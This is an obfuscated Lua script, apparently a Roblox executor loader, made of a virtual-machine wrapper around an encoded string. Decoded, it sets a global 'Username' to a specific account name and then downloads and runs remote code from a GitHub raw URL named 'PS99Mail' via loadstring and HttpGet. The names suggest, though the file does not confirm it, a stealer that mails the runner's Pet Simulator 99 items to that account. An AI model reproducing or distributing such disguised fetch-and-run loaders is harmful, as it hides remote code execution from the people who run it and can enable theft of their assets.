--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v91=v5(v84,v19);v19=nil;return v91;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -0 ;local v86;while true do if (v85==0) then v86=(v31/(((1642 -(1523 + 114)) -3)^(v32-(1 -0))))%((4 -2)^(((v33-((558 + 62) -(555 + 64))) -(v32-((1328 -396) -(857 + 74)))) + (569 -(367 + 201)))) ;return v86-(v86%((1993 -(68 + 997)) -(214 + 713))) ;end end else local v87=(1 + 1)^(v32-(1271 -(226 + 1044))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=0;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(117 -((989 -(892 + 65)) + (202 -117)))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=(1 -0) + 0 ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (606 -(87 + 263))) + v37 ;end if (v36==(180 -(67 + 113))) then v37,v38=v1(v16,v18,v18 + (5 -3) + 0 + 0 );v18=v18 + (4 -2) ;v36=998 -(915 + (107 -25)) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + ((2114 -924) -(1069 + 118)) );v18=v18 + 4 ;return (v42 * (38062656 -21285440)) + (v41 * (143357 -77821)) + (v40 * (45 + 211)) + v39 ;end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + 0)) then v46=792 -(368 + 423) ;v47=(v20(v45,3 -2 ,38 -(10 + (1431 -(630 + 793))) ) * ((7 -5)^(474 -(416 + 26)))) + v44 ;v43=6 -4 ;end if (v43==(1 + 1)) then v48=v20(v45,36 -15 ,469 -((491 -346) + 293) );v49=((v20(v45,32)==(431 -(44 + 386))) and  -(1487 -(998 + 488))) or ((4 -3) + 0) ;v43=3 + 0 ;end if (v43==0) then v44=v23();v45=v23();v43=773 -(201 + 571) ;end if (v43==(1141 -(116 + 1022))) then if (v48==(0 -0)) then if (v47==(0 + 0 + 0)) then return v49 * (0 -0) ;else v48=3 -2 ;v46=859 -(814 + 45) ;end elseif (v48==(5043 -2996)) then return ((v47==(0 + 0)) and (v49 * (1/(0 + (0 -0))))) or (v49 * NaN) ;end return v8(v49,v48-(1908 -((2008 -(760 + 987)) + 624)) ) * (v46 + (v47/((3 -1)^(1132 -(1020 + (1973 -(1789 + 124))))))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(766 -(745 + 21))) then return "";end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v68=1 + 0 , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=1636 -(1373 + 263) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==0) then v54=0;v55=nil;v53=1;end if (2==v53) then v58=nil;v59=nil;v53=3;end if (v53~=4) then else while true do if (v54~=2) then else local v96=1000 -(451 + 549) ;while true do if (0==v96) then v59=nil;v60=nil;v96=1;end if (v96~=(1 + 0)) then else v54=4 -1 ;break;end end end if (v54==3) then v61=nil;while true do local v98=0;local v99;while true do if (v98==(0 -0)) then v99=1384 -(746 + 638) ;while true do if (1~=v99) then else if ((1 + 0)~=v55) then else local v150=0 -0 ;local v151;while true do if (0==v150) then v151=0;while true do if (v151~=(341 -(218 + 123))) then else v60=v23();v61={};v151=1582 -(1535 + 46) ;end if (v151~=1) then else local v159=0;while true do if (v159==(1 + 0)) then v151=2;break;end if (v159==0) then for v162=1 + 0 ,v60 do local v163=560 -(306 + 254) ;local v164;local v165;local v166;local v167;while true do if (v163==1) then v166=nil;v167=nil;v163=1 + 1 ;end if (v163==0) then v164=0 -0 ;v165=nil;v163=1;end if (v163~=(1469 -(899 + 568))) then else while true do if (v164==(1 + 0)) then v167=nil;while true do if (v165==(0 -0)) then v166=v21();v167=nil;v165=1;end if (v165~=(604 -(268 + 335))) then else if (v166==(291 -(60 + 230))) then v167=v21()~=0 ;elseif (v166==(574 -(426 + 146))) then v167=v24();elseif (v166==(1 + 2)) then v167=v25();end v61[v162]=v167;break;end end break;end if (v164==0) then local v174=1456 -(282 + 1174) ;while true do if (v174==(812 -(569 + 242))) then v164=2 -1 ;break;end if (v174~=0) then else v165=0 + 0 ;v166=nil;v174=1;end end end end break;end end end v59[1027 -(706 + 318) ]=v21();v159=1252 -(721 + 530) ;end end end if ((1273 -(945 + 326))==v151) then v55=2;break;end end break;end end end break;end if (v99~=0) then else if (v55~=(0 -0)) then else local v152=0 + 0 ;while true do if (v152~=2) then else v55=701 -(271 + 429) ;break;end if ((1 + 0)==v152) then v58={};v59={v56,v57,nil,v58};v152=2;end if ((1086 -(461 + 625))~=v152) then else v56={};v57={};v152=1289 -(993 + 295) ;end end end if (v55==2) then local v153=0;while true do local v154=0 + 0 ;while true do if (0==v154) then if (v153==1) then return v59;end if (v153==0) then local v160=1171 -(418 + 753) ;while true do if (v160~=0) then else for v168=1,v23() do local v169=0 + 0 ;local v170;local v171;while true do if (v169~=(1 + 0)) then else while true do if (v170~=0) then else v171=v21();if (v20(v171,1,1 + 0 )~=0) then else local v175=0;local v176;local v177;local v178;local v179;while true do if (v175~=0) then else local v181=0;while true do if (v181==0) then v176=0 + 0 ;v177=nil;v181=530 -(406 + 123) ;end if (1==v181) then v175=1;break;end end end if (v175~=(1771 -(1749 + 20))) then else while true do if (v176==(1 + 1)) then local v183=0;while true do if (v183~=1) then else v176=1325 -(1249 + 73) ;break;end if (v183~=0) then else if (v20(v178,1 + 0 ,1146 -(466 + 679) )==(2 -1)) then v179[5 -3 ]=v61[v179[2]];end if (v20(v178,2,2)==1) then v179[3]=v61[v179[3]];end v183=1;end end end if (v176==1) then local v184=0;while true do if (v184~=1) then else v176=1902 -(106 + 1794) ;break;end if (v184~=(0 + 0)) then else v179={v22(),v22(),nil,nil};if (v177==0) then local v194=0;local v195;local v196;while true do if (v194==(1 + 0)) then while true do if (v195==(0 -0)) then v196=0 -0 ;while true do if (v196~=(114 -(4 + 110))) then else v179[3]=v22();v179[588 -(57 + 527) ]=v22();break;end end break;end end break;end if (0~=v194) then else v195=1427 -(41 + 1386) ;v196=nil;v194=104 -(17 + 86) ;end end elseif (v177==(1 + 0)) then v179[6 -3 ]=v23();elseif (v177==2) then v179[8 -5 ]=v23() -(2^(182 -(122 + 44))) ;elseif (v177~=(5 -2)) then else local v200=0;while true do if (v200==(0 -0)) then v179[3 + 0 ]=v23() -(2^16) ;v179[1 + 3 ]=v22();break;end end end v184=1;end end end if (v176~=(0 -0)) then else local v185=65 -(30 + 35) ;local v186;while true do if (v185~=0) then else v186=0 + 0 ;while true do if (v186==(1258 -(1043 + 214))) then v176=3 -2 ;break;end if (v186~=(1212 -(323 + 889))) then else local v197=0;while true do if (v197~=(2 -1)) then else v186=1;break;end if ((580 -(361 + 219))==v197) then v177=v20(v171,2,323 -(53 + 267) );v178=v20(v171,1 + 3 ,419 -(15 + 398) );v197=983 -(18 + 964) ;end end end end break;end end end if (v176~=(11 -8)) then else if (v20(v178,2 + 1 ,2 + 1 )~=1) then else v179[854 -(20 + 830) ]=v61[v179[4]];end v56[v168]=v179;break;end end break;end if (v175==1) then local v182=0 + 0 ;while true do if (v182==(127 -(116 + 10))) then v175=2;break;end if (v182==0) then v178=nil;v179=nil;v182=1 + 0 ;end end end end end break;end end break;end if (v169==(738 -(542 + 196))) then v170=0 -0 ;v171=nil;v169=1;end end end for v172=1,v23() do v57[v172-(1 + 0) ]=v28();end v160=1 + 0 ;end if (v160==(1 + 0)) then v153=2 -1 ;break;end end end break;end end end end v99=1;end end break;end end end break;end if (v54==(2 -1)) then v57=nil;v58=nil;v54=2;end if ((1551 -(1126 + 425))==v54) then local v97=405 -(118 + 287) ;while true do if (v97~=1) then else v54=3 -2 ;break;end if (v97~=0) then else v55=1121 -(118 + 1003) ;v56=nil;v97=1;end end end end break;end if (v53==(8 -5)) then v60=nil;v61=nil;v53=4;end if (v53~=(378 -(142 + 235))) then else v56=nil;v57=nil;v53=9 -7 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=10) then if (v83<=4) then if (v83<=1) then if (v83==0) then local v100=v82[2];v80[v100]=v80[v100](v13(v80,v100 + 1 ,v75));elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=2) then for v122=v82[2],v82[3] do v80[v122]=nil;end elseif (v83>3) then v74=v82[3];else do return;end end elseif (v83<=7) then if (v83<=5) then v74=v82[3];elseif (v83==6) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v64[v82[3]]=v80[v82[2]];end elseif (v83<=8) then local v103=v82[2];local v104=v80[v82[3]];v80[v103 + 1 ]=v104;v80[v103]=v104[v82[4]];elseif (v83>9) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end else v80[v82[2]]();end elseif (v83<=15) then if (v83<=12) then if (v83>11) then for v124=v82[2],v82[3] do v80[v124]=nil;end else local v108=0;local v109;local v110;local v111;local v112;while true do if (1==v108) then v75=(v111 + v109) -1 ;v112=0;v108=2;end if (v108==2) then for v145=v109,v75 do local v146=0;while true do if (v146==0) then v112=v112 + 1 ;v80[v145]=v110[v112];break;end end end break;end if (v108==0) then v109=v82[2];v110,v111=v73(v80[v109](v13(v80,v109 + 1 ,v82[3])));v108=1;end end end elseif (v83<=13) then v80[v82[2]]=v82[3];elseif (v83>14) then v64[v82[3]]=v80[v82[2]];else v80[v82[2]]();end elseif (v83<=18) then if (v83<=16) then local v115=v82[2];local v116=v80[v82[3]];v80[v115 + 1 ]=v116;v80[v115]=v116[v82[4]];elseif (v83>17) then do return;end elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v83<=19) then local v120=v82[2];v80[v120]=v80[v120](v13(v80,v120 + 1 ,v75));elseif (v83==20) then local v132=v82[2];local v133,v134=v73(v80[v132](v13(v80,v132 + 1 ,v82[3])));v75=(v134 + v132) -1 ;local v135=0;for v139=v132,v75 do local v140=0;while true do if (0==v140) then v135=v135 + 1 ;v80[v139]=v133[v135];break;end end end else v80[v82[2]]=v82[3];end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503063O00465833445844030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012153O00014O0002000100013O0026063O000200010001002O043O00020001001215000100013O0026060001000500010001002O043O00050001001215000200033O001207000200023O00120A000200043O00120A000300053O002010000300030006001215000500074O000B000300054O001300023O00022O000E000200010001002O043O00140001002O043O00050001002O043O00140001002O043O000200012O00123O00017O00",v9(),...);
